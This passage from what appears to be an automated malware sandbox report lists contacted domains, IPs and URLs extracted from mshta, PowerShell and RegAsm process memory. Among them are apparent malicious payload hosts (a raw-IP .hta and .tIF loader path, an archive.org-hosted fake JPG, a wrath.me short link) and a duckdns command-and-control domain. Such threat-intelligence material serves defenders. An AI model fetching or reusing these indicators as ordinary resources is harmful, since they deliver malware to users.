                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ia600102.us.archive.org
                    		207.241.227.242
                    		truetrue
                      		unknown
                      wrath.me
                      		188.114.96.3
                      		truefalse
                        		unknown
                        geoplugin.net
                        		178.237.33.50
                        		truefalse
                          		unknown
                          idabo.duckdns.org
                          		135.148.195.248
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://192.3.220.40/330/uh/newthingtobeonlinefor.htatrue
                              		unknown
                              https://wrath.me/EhYykLfalse
                                		unknown
                                https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgtrue
                                  		unknown
                                  http://192.3.220.40/330/RRCGGH.txttrue
                                    		unknown
                                    idabo.duckdns.orgtrue
                                      		unknown
                                      http://192.3.220.40/330/verybestthingswesharedfornew.tIFtrue
                                        		unknown
                                        http://geoplugin.net/json.gpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://192.3.220.40/$mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.imvu.comrRegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv8392.tmp.21.drfalse
                                            		unknown
                                            https://wrath.me/EhYykLr.htay(mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv8392.tmp.21.drfalse
                                                		unknown
                                                http://192.3.220.40/330/uh/newthingtobeonlinefor.htazzC:mshta.exe, 0000000F.00000003.487926229.00000000002DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv8392.tmp.21.drfalse
                                                      		unknown
                                                      http://www.nirsoft.netRegAsm.exe, 00000015.00000002.485996514.00000000003E3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://deff.nelreports.net/api/report?cat=msnbhv8392.tmp.21.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://192.3.220.40/330/uh/newthingtobeonlinefor.htaY3mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNotpowershell.exe, 0000001D.00000002.517043980.0000000002BDF000.00000004.00000800.00020000.00000000.sdmptrue
                                                            		unknown
                                                            http://cache.btrll.com/default/Pix-1x1.gifbhv8392.tmp.21.drfalse
                                                              		unknown
                                                              https://wrath.me/bumshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.google.comRegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://o.aolcdn.com/ads/adswrappermsni.jsbhv8392.tmp.21.drfalse
                                                                    		unknown
                                                                    http://www.msn.com/?ocid=iehpbhv8392.tmp.21.drfalse
                                                                      		unknown
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://static.chartbeat.com/js/chartbeat.jsbhv8392.tmp.21.drfalse
                                                                        		unknown
                                                                        http://www.msn.com/de-de/?ocid=iehpbhv8392.tmp.21.drfalse
                                                                          		unknown
                                                                          http://www.nirsoft.net/RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.453491405.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.553505468.000000000239F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473005129.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.000000000255B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://wrath.me/EhYykLs#mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://192.3.220.40/330/uh/newthingtobeonlinefor.hta3mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgXpowershell.exe, 0000000E.00000002.473005129.0000000002512000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://192.3.220.40/330/verybestthingswesharedfornew.tIFppowershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://go.crpowershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.493138621.0000000000538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://crl.usertru4powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv8392.tmp.21.drfalse
                                                                                          		unknown
                                                                                          https://wrath.me/EhYykL1(mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv8392.tmp.21.drfalse
                                                                                              		unknown
                                                                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv8392.tmp.21.drfalse
                                                                                                		unknown
                                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv8392.tmp.21.drfalse
                                                                                                  		unknown
                                                                                                  https://wrath.me/EhYykLmmshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://wrath.me/EhYykLimshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://192.3.220.40powershell.exe, 0000000E.00000002.473005129.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000026A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://192.3.220.40/330/uh/newthingtobeonlinefor.htaesmshta.exe, 0000000F.00000003.487881018.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000018.00000002.483636245.00000000009C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://crl.pkioverheipowershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://contextual.media.net/bhv8392.tmp.21.drfalse
                                                                                                              		unknown
                                                                                                              http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv8392.tmp.21.drfalse
                                                                                                                		unknown
                                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv8392.tmp.21.drfalse
                                                                                                                  		unknown
                                                                                                                  https://ia600102.us.archive.orgpowershell.exe, 0000000E.00000002.473005129.0000000002512000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                    		unknown
                                                                                                                    http://crl.entrpowershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.msn.com/bhv8392.tmp.21.drfalse
                                                                                                                        		unknown
                                                                                                                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv8392.tmp.21.drfalse
                                                                                                                          		unknown
                                                                                                                          http://192.3.220.40/330/uh/newthingtobeonlinefor.htaP3mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                              		unknown
                                                                                                                              http://192.3.220.40/330/verybestthingswesharedfornew.tIF7powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv8392.tmp.21.drfalse
                                                                                                                                  		unknown
                                                                                                                                  https://policies.yahoo.com/w3c/p3p.xmlbhv8392.tmp.21.drfalse
                                                                                                                                    		unknown
                                                                                                                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://192.3.220.40/330/verybestthingswesharedfornew.tIF/powershell.exe, 00000014.00000002.509594544.000000001AAA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.msn.com/advertisement.ad.jsbhv8392.tmp.21.drfalse
                                                                                                                                        		unknown
                                                                                                                                        http://b.scorecardresearch.com/beacon.jsbhv8392.tmp.21.drfalse
                                                                                                                                          		unknown
                                                                                                                                          https://wrath.me/EhYykL/mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://acdn.adnxs.com/ast/ast.jsbhv8392.tmp.21.drfalse
                                                                                                                                              		unknown
                                                                                                                                              http://ocsp.entrust.net03mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://192.3.220.40/330/uh/newthingtobeonlinefor.htaksmshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://wrath.me/EhYykLr.htaxmshta.exe, 0000000F.00000003.475534357.00000000039BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.00000000039BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.00000000039BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://contoso.com/Licensepowershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv8392.tmp.21.drfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv8392.tmp.21.drfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv8392.tmp.21.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://go.microspowershell.exe, 00000007.00000002.453491405.0000000002910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473005129.00000000036FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv8392.tmp.21.drfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://wrath.me/mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442807206.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487881018.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://192.3.220.40/330/uh/newthingtobeonlinefor.hta=3mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://192.3.220.40/330/verybestpowershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://wrath.me//mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv8392.tmp.21.drfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://geoplugin.net/json.gpORegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://contoso.com/powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv8392.tmp.21.drfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://192.3.220.40/330/uh/newthingtobeonlinefor.htahttp://192.3.220.40/330/uh/newthingtobeonlineformshta.exe, 00000004.00000003.438838908.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437632636.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475500690.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487438890.0000000002F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv8392.tmp.21.drfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://ia600102.us.archive.org/32/itpowershell.exe, 0000000C.00000002.553505468.0000000002854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.0000000002A21000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv8392.tmp.21.drfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv8392.tmp.21.drfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://192.3.220.40/mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://www.ccleaner.com/go/app_cc_pro_trialkeybhv8392.tmp.21.drfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://contextual.media.net/8/nrrV73987.jsbhv8392.tmp.21.drfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://geoplugin.net/json.gpyRegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv8392.tmp.21.drfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.imvu.com/GKRegAsm.exe, 00000018.00000002.483291462.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown

                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                135.148.195.248
                                                                                                                                                                                                		idabo.duckdns.orgUnited States
                                                                                                                                                                                                		18676AVAYAUStrue
                                                                                                                                                                                                188.114.97.3
                                                                                                                                                                                                		unknownEuropean Union
                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                188.114.96.3
                                                                                                                                                                                                		wrath.meEuropean Union
                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                207.241.227.242
                                                                                                                                                                                                		ia600102.us.archive.orgUnited States
